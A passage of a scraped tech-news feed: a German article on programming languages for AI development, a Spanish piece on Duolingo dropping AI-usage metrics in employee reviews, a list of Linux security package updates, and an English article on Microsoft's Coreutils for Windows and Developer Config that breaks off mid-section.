<p>Davon abgesehen sind die verfügbaren mathematischen und statistischen Bibliotheken von Python denen anderer Programmiersprachen weit voraus: <a title="NumPy" href="https://numpy.org/" target="_blank" rel="noopener">NumPy</a> ist inzwischen so allgegenwärtig, dass es beinahe als Standard-API für Tensor Operations bezeichnet werden kann, während <a title="Pandas" href="https://pandas.pydata.org/" target="_blank" rel="noopener">Pandas</a> die flexiblen Dataframes von R in die Python-Welt trägt. Geht es um Natural Language Processing (NLP) haben Sie die Wahl zwischen dem altehrwürdigen <a title="NLTK" href="https://www.nltk.org/" target="_blank" rel="noopener">NLTK</a> und dem superschnellen <a title="SpaCy" href="https://spacy.io/" target="_blank" rel="noopener">SpaCy</a>, während sich für Machine-Learning-Zwecke das bewährte <a title="scikit-learn" href="https://scikit-learn.org/stable/" target="_blank" rel="noopener">scikit-learn</a> empfiehlt. Geht es hingegen um Deep Learning, sind alle aktuellen Bibliotheken (<a title="TensorFlow" href="https://www.tensorflow.org/" target="_blank" rel="noopener">TensorFlow</a>, <a title="PyTorch" href="https://pytorch.org/" target="_blank" rel="noopener">PyTorch</a>, <a title="Chainer" href="https://chainer.org/" target="_blank" rel="noopener">Chainer</a>, <a title="Apache MXNet" href="https://mxnet.apache.org/" target="_blank" rel="noopener">Apache MXNet</a>, etc.) im Grunde “Python-first”-Projekte.</p>



<p>Wenn Sie ein regelmäßiger Besucher von <a title="arXiv" href="https://arxiv.org/" target="_blank" rel="noopener">arXiv</a> sind, wird Ihnen längst aufgefallen sein, dass die Mehrzahl der dortigen Deep-Learning-Forschungsprojekte, die Quellcode zur Verfügung stellen, dazu auf Python setzen. In Sachen Deployment-Modelle haben Microservice-Architekturen und -Technologien wie <a href="https://github.com/seldonio/seldon-core" target="_blank" rel="noreferrer noopener">SeldonCore</a> die Auslieferung von Python-Modellen in Produktivumgebungen wesentlich vereinfacht.</p>



<p><a href="https://www.computerwoche.de/article/2762145/python-besitzt-mehr-als-300-bibliotheken.html" title="Python" target="_blank">Python</a> ist zweifellos die Programmiersprache der Wahl, wenn es um KI-Forschung geht: Sie bietet die größte Auswahl an Machine und Deep Learning Frameworks und ist die Coding-Sprache, die innerhalb der KI-Welt tonangebend ist.</p>



<h2 class="wp-block-heading">C++</h2>



<p><a href="https://www.computerwoche.de/article/2816926/wie-sich-c-gegen-c-python-und-co-schlaegt.html" title="C++" target="_blank">C++</a> ist aller Voraussicht nach nicht die erste Wahl für Ihr <a href="https://www.computerwoche.de/article/2781630/so-wird-ihr-ki-projekt-ein-erfolg.html" title="KI-Projekt" target="_blank">KI-Projekt</a>. Allerdings wird Deep Learning im Edge-Bereich ein immer gängigeres Szenario. In diesem Fall müssen Sie Ihre Modelle auf Systemen zum Laufen bringen, die nur sehr begrenzte Ressourcen zur Verfügung haben. Um das letzte bisschen Performance aus dem System zu pressen, kann es nötig werden, noch einmal in die Untiefen der Pointer-Welt abzutauchen.</p>



<p>Glücklicherweise kann moderner C++ Code aber tatsächlich angenehm zu schreiben sein. Hierfür stehen Ihnen mehrere Ansätze zur Wahl: Entweder Sie nutzen Bibliotheken wie Nvidias <a href="https://www.computerwoche.de/article/2818437/was-ist-cuda.html" target="_blank">CUDA</a> um ihren eigenen Programmcode zu schreiben, der direkt in die GPU fließt – oder Sie setzen wahlweise auf TensorFlow oder PyTorch, um Zugang zu flexiblen high-level <a href="https://www.computerwoche.de/article/4004872/die-besten-apis-um-ki-zu-integrieren.html" target="_blank">APIs</a> zu erlangen. Sowohl <a title="PyTorch" href="https://www.computerwoche.de/article/2794453/5-gruende-fuer-das-deep-learning-framework.html" target="_blank">PyTorch</a> als auch <a title="TensorFlow" href="https://www.computerwoche.de/article/2789330/die-besten-tools-fuer-tensorflow.html" target="_blank">TensorFlow</a> erlauben Ihnen, Modelle, die in Python geschrieben sind, in eine C++ Laufzeitumgebung zu integrieren. So rücken Sie deutlich näher an den Produktiveinsatz, bleiben dabei aber flexibel in der Entwicklung.</p>



<p>Weil KI-Applikationen sich immer stärker über alle Devices – von Embedded Systems bis hin zu riesigen Clustern – hinweg ausbreiten, ist C++ ein wichtiger Bestandteil des KI-Coding-Toolkits. Um <a href="https://www.computerwoche.de/article/2807255/so-sichern-sie-den-netzwerkrand-ab.html" title="künstliche Intelligenz im Edge-Bereich" target="_blank">künstliche Intelligenz im Edge-Bereich</a> zu realisieren, gilt es eben nicht nur akkurat zu programmieren, sondern auch qualitativ gut und schnell.</p>



<h2 class="wp-block-heading">Java und andere JVM-Sprachen</h2>



<p>Die Familie der JVM-Programmiersprachen (<a title="Java" href="https://www.computerwoche.de/article/2814735/warum-java-immer-noch-rockt.html" target="_blank">Java</a>, Scala, <a title="Kotlin" href="https://www.computerwoche.de/article/2817523/was-ist-kotlin.html" target="_blank">Kotlin</a>, Clojure, etc.) ist weiterhin eine gute Wahl, wenn es um die Entwicklung von KI-Applikationen geht. Eine reichhaltige Auswahl an Bibliotheken steht für nahezu alle Aspekte zur Auswahl – sei es Natural Language Processing (<a title="CoreNLP" href="https://stanfordnlp.github.io/CoreNLP/" target="_blank" rel="noopener">CoreNLP</a>), Tensor Operations oder GPU-beschleunigtes Deep Learning (<a title="DL4J" href="https://deeplearning4j.org/" target="_blank" rel="noopener">DL4J</a>). Darüber hinaus gewährleisten diese Coding-Sprachen auch einfachen Zugang zu Big-Data-Plattformen wie <a title="Apache Spark" href="https://www.infoworld.com/article/2259224/what-is-apache-spark-the-big-data-platform-that-crushed-hadoop.html" target="_blank">Apache Spark</a> und <a title="Apache Hadoop" href="https://hadoop.apache.org/" target="_blank" rel="noopener">Apache Hadoop</a>.</p>



<p>Für die meisten Unternehmen ist <a href="https://www.computerwoche.de/article/2814678/darum-heisst-java-java.html" title="Java" target="_blank">Java</a> die lingua franca – und mit Java 8 und neueren Versionen verliert auch die Erstellung von Java Code ihren Schrecken. Eine <a href="https://www.computerwoche.de/article/2793583/kuenstliche-intelligenz-verdraengt-den-menschen-nicht.html" title="KI-Applikation" target="_blank">KI-Applikation</a> in Java zu programmieren mag sich ein wenig langweilig anfühlen, sorgt aber in der Regel für zufriedenstellende Ergebnisse und ermöglicht Ihnen, alle existierenden Bestandteile einer Java-Infrastruktur für Entwicklung, Deployment und Monitoring einzusetzen.</p>



<h2 class="wp-block-heading">JavaScript</h2>



<p><a href="https://www.computerwoche.de/article/2832952/was-ist-javascript.html" title="JavaScript" target="_blank">JavaScript</a> ausschließlich für die Entwicklung von KI-Applikationen zu erlernen, ist ein höchst unwahrscheinliches Szenario. Allerdings bietet Googles <a href="https://www.tensorflow.org/js" title="TensorFlow.js" target="_blank" rel="noopener">TensorFlow.js</a> weiterhin eine gute Möglichkeit, Ihre Keras- und TensorFlow-Modelle über Browser oder Node.js auszuliefern.</p>



<p>Dennoch ist der große Ansturm von <a href="https://www.computerwoche.de/article/2794625/was-javascript-von-typescript-unterscheidet.html" title="JavaScript-Entwicklern" target="_blank">JavaScript-Entwicklern</a> im Bereich <a href="https://www.computerwoche.de/k/kuenstliche-intelligenz-artifical-intelligence,3544" target="_blank" class="idgGlossaryLink">Künstliche Intelligenz</a> bislang ausgeblieben. Das könnte daran liegen, dass das JavaScript-Ökosystem in Sachen verfügbare Bibliotheken bislang den nötigen Tiefgang vermissen lässt – zumindest im Vergleich zu Programmiersprachen wie Python. Darüber hinaus stehen auf Serverseite durch Deployment-Modelle mit Node.js (wiederum im Vergleich zu den Python-Optionen) keine wirklichen Vorteile in Aussicht. KI-Applikationen auf JavaScript-Basis dürften deshalb auch weiterhin auf Browser-Basis entstehen. </p>



<h2 class="wp-block-heading">Swift</h2>



<p><a href="https://www.tensorflow.org/swift" title="Swift for TensorFlow" target="_blank" rel="noopener">Swift for TensorFlow</a> verbindet die neuesten und besten Features von TensorFlow mit den Vorteilen von Python-Bibliotheken, die sich problemlos einbinden lassen – ganz so als würden Sie Python selbst nutzen.</p>



<p>Das Team von fast.ai werkelt derzeit an einer Swift-Version seiner populären Bibliothek – und stellt zahlreiche Optimierungen in Aussicht, gerade in Zusammenhang mit dem <a href="https://www.computerwoche.de/article/2826586/was-ist-llvm.html" target="_blank">LLVM compiler</a>. Von “production ready” kann zwar noch keine Rede sein, aber auf dieser Grundlage könnte die nächste Generation von Deep-Learning-Entwicklungsarbeit entstehen – Sie sollten Swift deshalb auf alle Fälle im Auge behalten.</p>



<h2 class="wp-block-heading">R</h2>



<p><a href="https://www.r-project.org/" title="R" target="_blank" rel="noopener">R</a> ist die Programmiersprache der Wahl für <a href="https://www.computerwoche.de/article/2774747/was-data-scientists-koennen-muessen.html" title="Data Scientists" target="_blank">Data Scientists</a>. Developer aus anderen Bereichen könnten die Coding-Sprache wegen ihres Dataframe-zentrischen Ansatzes hingegen als verwirrend empfinden.</p>



<p>Für ein Team leidenschaftlicher R-Entwickler kann es durchaus Sinn machen, Integrationen mit <a href="https://www.tensorflow.org/" title="TensorFlow" target="_blank" rel="noopener">TensorFlow</a>, <a href="https://keras.io/" title="Keras" target="_blank" rel="noopener">Keras</a> oder <a href="https://www.h2o.ai/" title="H2O" target="_blank" rel="noopener">H2O</a> für Forschung und Prototyping einzusetzen. Hinsichtlich der Performance ist R für den Produktiveinsatz aber lediglich bedingt zu empfehlen. Zwar lässt sich performanter R Code durchaus produktiv zum Einsatz bringen, einfacher dürfte es aber in den allermeisten Fällen sein, den R-Prototypen in Java oder Python neu zu programmieren.</p>



<h2 class="wp-block-heading">KI programmieren – weitere Optionen</h2>



<p>Natürlich sind die vier genannten Programmiersprachen nicht die einzigen Optionen, um <a href="https://www.computerwoche.de/k/kuenstliche-intelligenz-artifical-intelligence,3544" target="_blank" class="idgGlossaryLink">Künstliche Intelligenz</a> zu programmieren. Die folgenden beiden Coding-Sprachen könnten – je nach Einsatzzweck – ebenfalls von Interesse für Ihre <a href="https://www.computerwoche.de/article/2792741/ki-bewaehrt-sich-in-der-praxis.html" title="KI-Projekte" target="_blank">KI-Projekte</a> sein:</p>



<p><strong><a href="https://www.lua.org/" target="_blank" rel="noreferrer noopener">Lua</a></strong></p>



<p>Vor einigen Jahren wurde Lua als “next big thing” im Bereich der Künstlichen Intelligenz gehandelt. Das lag in erster Linie am <a title="Torch Framework" href="https://torch.ch/" target="_blank" rel="noopener">Torch Framework</a> – eine der populärsten Machine-Learning-Bibliotheken sowohl für den produktiven Einsatz als auch für Forschungszwecke. Wenn Sie in ältere DeepLearning-Modelle abtauchen, finden sich oft zahlreiche Verweise auf Torch und Lua-Quellcode. Es könnte durchaus nützlich sein, sich etwas Knowhow über die Torch API anzueignen, die einige Ähnlichkeiten zur Basis-API von PyTorch aufweist. Wenn Sie allerdings kein gesteigertes Bedürfnis haben, für Ihre Applikationen in historische Forschung abzutauchen, können Sie auf Lua auch gut und gerne verzichten.</p>



<p><strong><a href="https://julialang.org/" target="_blank" rel="noreferrer noopener">Julia</a></strong></p>



<p>Bei Julia handelt es sich um eine High-Performance-Programmiersprache, die ihren Fokus auf numerische Berechnungen legt. Dadurch passt sie auch wunderbar in die mathematisch ausgerichtete Welt der Künstlichen Intelligenz. Julia mag derzeit nicht die populärste Coding-Sprache sein, allerdings bieten Wrapper wie <a title="TensorFlow.jl" href="https://github.com/malmaud/TensorFlow.jl" target="_blank" rel="noopener">TensorFlow.jl</a> und <a title="Mocha" href="https://github.com/pluskid/Mocha.jl" target="_blank" rel="noopener">Mocha</a> guten Deep-Learning-Support. Wenn das relativ kleine Ökosystem kein Ausschlusskriterium für Sie darstellt und Sie von Julias Fokus auf High-Performance-Berechnungen profitieren wollen, sollten Sie einen Blick riskieren. (fm)</p>



<p><strong>Dieser Artikel ist <a href="https://www.infoworld.com/article/2258342/6-best-programming-languages-for-ai-development.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Infoworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[La métrica que hizo tropezar la estrategia ‘AI-first’ de Duolingo]]></title>
<description><![CDATA[En abril de 2026, el CEO de Duolingo, Luis von Ahn, reconoció que la compañía había retirado uno de los elementos más delicados de su estrategia de inteligencia artificial: el uso de IA dejaba de contar en las evaluaciones de desempeño de sus empleados. Lo llamativo es que, un año antes, una cris...]]></description>
<link>https://tsecurity.de/de/3624971/it-nachrichten/la-mtrica-que-hizo-tropezar-la-estrategia-ai-first-de-duolingo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624971/it-nachrichten/la-mtrica-que-hizo-tropezar-la-estrategia-ai-first-de-duolingo/</guid>
<pubDate>Thu, 25 Jun 2026 16:48:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>En abril de 2026, el CEO de Duolingo, Luis von Ahn, reconoció que la compañía había <strong>retirado </strong>uno de los elementos más delicados de su estrategia de inteligencia artificial: <strong>el uso de IA dejaba de contar en las evaluaciones de desempeño de sus empleados</strong>. Lo llamativo es que, un año antes, una crisis pública en toda regla no había conseguido cambiar su estrategia ni un milímetro.</p>



<p>El primer debate se abrió en la primavera de 2025, <a href="https://www.linkedin.com/posts/duolingo_below-is-an-all-hands-email-from-our-activity-7322560534824865792-l9vh" target="_blank" rel="nofollow">cuando Duolingo se declaró ‘AI-first’</a>. Ahí saltó la discusión habitual de la IA frente a las personas. Prendió rápido: usuarios borrándose la <em>app </em>y las redes de la marca inundadas de críticas. Von Ahn resolvió con oficio la crisis reputacional: aclaraciones, matices y un tono más suave. Le funcionó. El fuego se apagó, la estrategia siguió intacta y la empresa continuó creciendo.</p>



<p>Pero se había abierto un segundo <strong>debate, menos visible</strong> pero igualmente importante: el de la evaluación de los empleados. Ese no se aplacaba con una nota de prensa. Fuera apenas trascendió: lo que una empresa haga con sus evaluaciones internas no provoca bajas masivas ni incendia TikTok.</p>



<p>Dentro fue otra cosa. No hubo clamor, pero sí una objeción de fondo. Y esta vez el CEO cedió. La comunicación fue casi inversa a la del año anterior: no hubo gran rectificación pública ni operación de imagen. Von Ahn lo mencionó casi de pasada en un podcast: esa métrica se había retirado.</p>



<p>Una <strong>crisis pública</strong> <strong>no movió la estrategia</strong>. Una objeción interna, sí. Lo interesante no es tanto la diferencia de comunicación como la razón de fondo. ¿Tan grave era pedir a los empleados que usaran la IA? ¿<strong>Por qué</strong> hubo que dar <strong>marcha atrás</strong>?</p>



<h2 class="wp-block-heading">Cuando la métrica convirtió la IA en obediencia</h2>



<p>Todo empezó por un efecto de deslumbramiento. La IA revolucionó la <strong>productividad</strong> de Duolingo en la creación de contenido: <strong><a href="https://investors.duolingo.com/news-releases/news-release-details/duolingo-launches-148-new-language-courses" rel="nofollow">los primeros 100 cursos costaron doce años; con IA llegaron 148 en menos de uno</a></strong>. Espectacular, visible y medible. El razonamiento que vino después era inevitable: si la IA es capaz de esto, aún conseguirá más cuanto más se use. Así que el uso pasó a contar en las <strong>evaluaciones</strong>.</p>



<p>Sin embargo, esa decisión <strong>cambió la motivación</strong> para usar la IA dentro de la empresa. Dejó de ser un acelerador y se convirtió en <strong>un objetivo</strong> en sí mismo. Y los objetivos están para cumplirse: la gente empezó a usar la IA para que el número subiera, no necesariamente porque le ayudara a trabajar mejor. El indicador medía <strong>obediencia</strong>, no resultados. Y los empleados empezaron a hacerse una pregunta incómoda: ¿la empresa quería que usaran la IA porque les servía, o que la usaran y punto?</p>



<p>Pronto empezaron a aparecer los límites. En la generación de historias, los resultados fueron distintos a los previstos: una cosa es que la IA escriba una historia convincente en una demo; otra, producir alrededor de mil historias para aprender un idioma y descubrir que <a href="https://www.fastcompany.com/91541042/duolingos-ceo-admits-where-he-got-ai-wrong" target="_blank" rel="nofollow">cerca del <strong>20%</strong> sale <strong>inservible</strong></a>. En el código, reconoce el propio von Ahn, <strong><a href="https://fortune.com/2026/04/13/duolingo-ceo-luis-von-ahn-ai-usage-requirement-employee-performance-evaluations" rel="nofollow">la IA todavía no gana a un buen ingeniero</a></strong>: lo que escribe puede costar más de depurar de lo que ahorra. El camino bueno es rapidísimo; el malo se come más tiempo del que parecía liberar.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Severin-Hacker-and-Luis-von-Ahn.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Severin Hacker y Luis von Ahn, cofundadores de Duolingo." class="wp-image-4189488" width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p><strong>Severin Hacker y Luis von Ahn, cofundadores de Duolingo.</strong></p>
</figcaption></figure><p class="imageCredit">Duolingo</p></div>



<p>Esto demostró que <strong>la empresa tenía puntos ciegos con la IA</strong>. El impacto de la IA es desigual: brilla en unas tareas, pero estorba en otras. Ese era el error de fondo. Pero eso no se ve en una métrica que registra cuántas veces se recurre a la herramienta, no si era la adecuada. Y al exigir IA en todo, garantiza una sola cosa: que acabe en todos los lados, incluidos aquellos donde es un obstáculo.</p>



<p>Al final, el propio CEO se dio cuenta. Cuando retiró la métrica lo explicó sin rodeos: lo que importa es que <strong>cada uno haga su trabajo</strong> lo mejor posible; muchas veces la IA ayuda, pero cuando no, <strong><a href="https://fortune.com/2026/04/13/duolingo-ceo-luis-von-ahn-ai-usage-requirement-employee-performance-evaluations" rel="nofollow">forzarla no tiene sentido</a></strong>. Lo dice quien declaró su empresa ‘AI-first’. En otras palabras, el hombre más convencido de la sala admitiendo que evaluar por el uso no funcionaba.</p>



<h2 class="wp-block-heading">¿Qué mide un CIO cuando mide la IA?</h2>



<p>Muchas de las métricas de<strong> IA</strong> que se usan hoy son, por debajo, <strong>métricas de uso disfrazadas</strong>. Tokens consumidos, licencias activadas, porcentaje de código asistido: suenan a impacto, pero todas cuentan algo parecido, cuánto se recurre a la herramienta. Y la corriente empuja en esa dirección. Jensen Huang, fundador de Nvidia, ha llegado a decir que esperaría que <strong><a href="https://www.tomshardware.com/tech-industry/artificial-intelligence/jensen-huang-says-nvidia-engineers-should-use-ai-tokens-worth-half-their-annual-salary-every-year-to-be-fully-productive-compares-not-using-ai-to-using-paper-and-pencil-for-designing-chips" target="_blank" rel="nofollow">un ingeniero utilizara el equivalente a la mitad de su salario en <em>tokens</em></a></strong>. La <strong>presión por meter la IA en la narrativa de la empresa</strong>, sea como sea, es real. Pero ninguna de esas cifras dice por sí misma si la IA ha dado resultados.</p>



<p>Entonces, ¿cómo medir? Lo mejor es empezar sin condicionantes. No preguntarse primero cuánta IA se usa, sino <strong>qué ha cambiado</strong>. Si la IA ha acortado un proceso, mejorado una decisión o crear algo que antes no existía. Si se mide el tiempo, hay que distinguir entre el tiempo que la IA parece ahorrar en una tarea y el tiempo útil que realmente libera al final del proceso.</p>



<p>Este enfoque abre la puerta a resultados menos vistosos, pero más útiles. Un <strong>ensayo controlado de 2025</strong> con <strong>programadores expertos</strong>, mostró un resultado inesperado: <strong><a href="https://metr.org/blog/2025-07-10-early-2025-ai-experienced-os-dev-study" target="_blank" rel="nofollow">tardaban un 19% más con IA que sin ella</a></strong> y, aun así, estaban convencidos de haber ido más rápido. El dato no sirve para concluir que la IA no funciona en programación. Sirve para algo más importante: recordar que <strong>la percepción de velocidad no basta</strong>. Hay que medir objetivamente el resultado final, porque incluso usuarios expertos pueden confundir sensación de productividad con productividad real.</p>



<p>Las métricas que van más allá del uso indiscriminado permiten decidir dónde tiene sentido aplicar IA, en vez de forzarla sobre procesos que no la pedían para poder decir que ya se usa. Solo así se sabe dónde concentrar recursos, dónde rediseñar procesos y dónde soltar.</p>



<p>Hay además una pregunta que casi nunca se hace: ¿<strong>para quién es la métrica</strong>? Se habla mucho de los indicadores hacia el comité, hacia los accionistas o hacia fuera. Pero dos indicadores pueden parecer idénticos y servir, sin embargo, a fines opuestos. Uno existe para que la empresa pueda decir que usa IA. El otro, para que el <strong>empleado</strong> que la usa <strong>aprenda</strong> a sacarle partido. Y nadie conoce mejor que ese empleado dónde la IA le ahorra una mañana entera y dónde se la hace perder revisando un texto con errores o un código que no compila.</p>



<p>En conclusión, <strong>una organización</strong> termina <strong>pareciéndose a lo que mide</strong>. Elegir las métricas de IA no es una tarea técnica que se delega: es elegir <strong>en qué se convierte la empresa</strong>. Si se mide el uso, se tendrá uso. Si se mide el resultado, se tendrá una organización que emplea la IA donde de verdad sirve.</p>



<p>El impacto del CIO en relación con la IA no depende de que se use mucho en la organización. <strong>La IA sigue reescribiendo la función del CIO</strong>, y una parte de esa redefinición pasa por las métricas que pone delante de la empresa.</p>



<p><em>Este es solo uno de los frentes. La IA está cambiando las métricas, pero también el talento, los procesos, la relación con negocio y la forma en que se reparte el conocimiento dentro de la empresa. Seguiremos explorando cómo todo ello redefine la función del CIO.</em></p>



<hr class="wp-block-separator has-alpha-channel-opacity">
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (libpng, libsolv, libtasn1, libxml2, libxslt, python3.14, tigervnc, and vim), Debian (cloud-init, postgresql-13, and yelp), Mageia (nats-server), Oracle (.NET 10.0, .NET 8.0, .NET 9.0, bind9.18, cockpit, compat-openssl11, dnsmasq, dovecot, evince, ex...]]></description>
<link>https://tsecurity.de/de/3624688/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624688/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 25 Jun 2026 15:25:52 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (libpng, libsolv, libtasn1, libxml2, libxslt, python3.14, tigervnc, and vim), <b>Debian</b> (cloud-init, postgresql-13, and yelp), <b>Mageia</b> (nats-server), <b>Oracle</b> (.NET 10.0, .NET 8.0, .NET 9.0, bind9.18, cockpit, compat-openssl11, dnsmasq, dovecot, evince, expat, flatpak, freerdp, gimp, golang, grafana, grafana-pcp, httpd, jmc, jq, kernel, libsndfile, libsoup, libtiff, mod_http2, mysql:8.0, nginx, nginx:1.24, openexr, php:8.2, poppler, pyOpenSSL, python-markdown, redis:7, samba, thunderbird, tigervnc, unbound, and vim), <b>Red Hat</b> (libpng, libpng12, and libpng15), <b>SUSE</b> (apptainer, bind, crun, freeipmi, ghc-crypton-x509-store, ghc-crypton-x509-system, google-guest-agent, google-osconfig-agent, GraphicsMagick, gstreamer-plugins-bad, hamlib, iproute2, java-1_8_0-openjdk, kubevirt1, libarchive, libheif, libpng15, mbedtls, mbedtls-2, openssl-1_1, python-biopython, python-PyJWT, tar, webkit2gtk3, and xen), and <b>Ubuntu</b> (ffmpeg, libdbi-perl, and perl).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in java-1_8_0-openjdk (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3624345/unix-server/security-mehrere-probleme-in-java-180-openjdk-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624345/unix-server/security-mehrere-probleme-in-java-180-openjdk-suse/</guid>
<pubDate>Thu, 25 Jun 2026 13:46:26 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Making Windows a developer platform, again]]></title>
<description><![CDATA[Microsoft has been rethinking its commitment to Windows for a while now, with Insider builds of the operating system showing a swing away from web-based user experiences and back to native code. That commitment got a boost at Build 2026 with a bundle of announcements that focused on tools and fea...]]></description>
<link>https://tsecurity.de/de/3623950/ai-nachrichten/making-windows-a-developer-platform-again/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623950/ai-nachrichten/making-windows-a-developer-platform-again/</guid>
<pubDate>Thu, 25 Jun 2026 11:34:08 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft has been rethinking its commitment to Windows for a while now, with Insider builds of the operating system showing a swing away from web-based user experiences and back to native code. That commitment got a boost at Build 2026 with a <a href="https://blogs.windows.com/windowsdeveloper/2026/06/02/build-2026-furthering-windows-as-the-trusted-platform-for-development/" data-type="link" data-id="https://blogs.windows.com/windowsdeveloper/2026/06/02/build-2026-furthering-windows-as-the-trusted-platform-for-development/">bundle of announcements</a> that focused on tools and features that help developers take advantage of the platform.</p>



<p>The most obvious is support for the standard core Unix utilities, in the shape of a Microsoft-maintained fork of the popular <a href="https://github.com/uutils/coreutils">Rust-based uutils coreutils package</a>, <a href="https://github.com/microsoft/coreutils">Coreutils for Windows</a>. Coreutils for Windows installs as a single binary, making it easier to update and manage. And it is one of those tools that does exactly what it says on the tin, providing a Windows implementation of the commands you’re using in Linux virtual machines or in Windows Subsystem for Linux (WSL).</p>



<h2 class="wp-block-heading">Building on Windows Terminal with Coreutils</h2>



<p>Much of the Windows developer experience has moved back to the command line via Windows’ rearchitected terminal, underscoring the need for a consistent experience across the multiple development environments running on your PC. The context switch between a Linux environment through WSL or in a Visual Studio remote terminal and the Windows PowerShell and cmd environment can be jarring.</p>



<p>I often find myself typing a Unix command in Windows and vice versa, seeing an all-too-familiar error message, followed by trying to remember what I should have typed, and finally trying again. It wastes time and fills my terminal buffer with junk.</p>



<p>Microsoft Coreutils solves the problem by handling Unix commands for me. It not only provides the same command syntax, but also formats the output correctly. It’s a little odd seeing a well-presented directory listing in Windows when typing <code>ls -al</code>. But once you get used to it, having the same experience on all your systems saves time and avoids having to switch context every time you open a new terminal tab or when you switch back from a SSH session.</p>



<p>There’s another advantage to having Coreutils in Windows: scripts written for a Unix system will port to Windows. This can help with common operations, like builds, or writing your own custom functions.</p>



<p>It’s important to note that Coreutils for Windows is only a preview for now, and not all the Coreutils functions are fully implemented. There are inevitably conflicts with existing cmd and PowerShell commands, so for example, Microsoft’s Coreutils doesn’t ship with the familiar <code>more</code> or <code>dir</code> commands. Other commands, like <code>kill</code>, can’t be implemented at present because Windows doesn’t support the Unix signals model. And still others won’t ship because they’re based on low-level Unix concepts, like groups and owners, that are part of POSIX but not Windows. Microsoft provides a list of other issues on the project’s <a href="https://github.com/uutils/coreutils/blob/main/README.md" data-type="link" data-id="https://github.com/uutils/coreutils/blob/main/README.md">GitHub Readme</a>, along with suggestions for alternatives that can be helpful. For example, as Windows doesn’t have <code>/dev/null</code>, you can replace it with <code>NUL</code> in scripts.</p>



<p>Getting started is simple. You can download the latest release from GitHub or use winget to download and install from the command line. For now, I’d recommend using winget, as it provides an update mechanism as well as an uninstaller. It’s well worth adding to your Windows environment. It is already making my life a lot easier.</p>



<h2 class="wp-block-heading">Fast track setup with Windows Developer Config</h2>



<p>Another important tool that gets a public release is <a href="https://github.com/microsoft/WindowsDeveloperConfig/">Windows Developer Config</a>. This builds on the techniques used to configure <a href="https://www.infoworld.com/article/2335553/microsoft-dev-box-your-development-workstation-on-azure.html">cloud-hosted Microsoft Dev Boxes</a> and brings them to any Windows PC, <a href="https://github.com/microsoft/WindowsDeveloperConfig/blob/main/windows-dev-config/README.md">using winget and other tools to build out a ready-to-run development PC</a>. Dev Configs aren’t only for Windows. They also work on Linux VMs or in WSL, so that all the environments you use to write code can be configured with your tool chains and more.</p>



<p>There are three parts to the Dev Config process: a set of <a href="https://www.infoworld.com/article/2263233/getting-started-with-winget-the-windows-package-manager.html">winget configurations</a> to install familiar tools and tune Windows, a set of scripts to enable cloud-native development scenarios and workloads, and a set of scripts that configure WSL to work with your choice of shell, distribution services like Homebrew, and your distribution’s installation and update mechanisms.</p>



<p>The three options are open source, with all the necessary files on GitHub. It’s important to note that while the tooling is opinionated, it’s not prescriptive. If you want to extend the winget configuration to add a feature like Coreutils, you can. The default configuration is intended to be the same as that delivered when you spin up a Dev Box Cloud PC virtual machine, and the tooling uses the same techniques including the PowerShell-based Desired State Configuration to ensure that existing tools are updated as necessary.</p>



<p>Having a service that delivers the same environment as a Dev Box makes perfect sense. Microsoft has been using these tools internally, and its fast network makes Cloud PCs easy to use. However, that’s not the case for all of us, where slow networks and cloud latencies make it hard to use hosted virtual environments. We might even want to use those resources when we’re on the move, working with checked-out Git repositories on a train or in a plane, where bandwidth is not reliable.</p>



<p>Setting up a PC with the base Dev Config is as easy as it should be. Winget’s configuration service runs on both new and old PCs, installing applications where needed, running updates where necessary, and applying the necessary developer settings to Windows. You can download the scripts by cloning a GitHub repository (if Git is already installed) or by downloading a zip archive. Microsoft provides instructions for both options, along with the command and options used to start the process. Your PC may reboot as part of the process of installing WSL, but the script is designed to restart once it’s up and running again. It’s idempotent, so you can run it regularly to avoid configuration drift.</p>



<p>The apps installed include the latest PowerShell, Git, CLIs for GitHub, GitHub Copilot, the <a href="https://www.infoworld.com/article/4132938/working-with-the-windows-app-development-cli.html">Windows App SDK</a>, <a href="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html" data-type="link" data-id="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html">Visual Studio Code</a>, and language support for Node.js, Python, and .NET. The install brings in developer-friendly fonts and a theme engine for the Windows Terminal. Other features include customizing File Explorer and the Windows Task Bar, as well as hiding notifications to improve focus.</p>



<h2 class="wp-block-heading">Tweaking WSL for Comfort</h2>



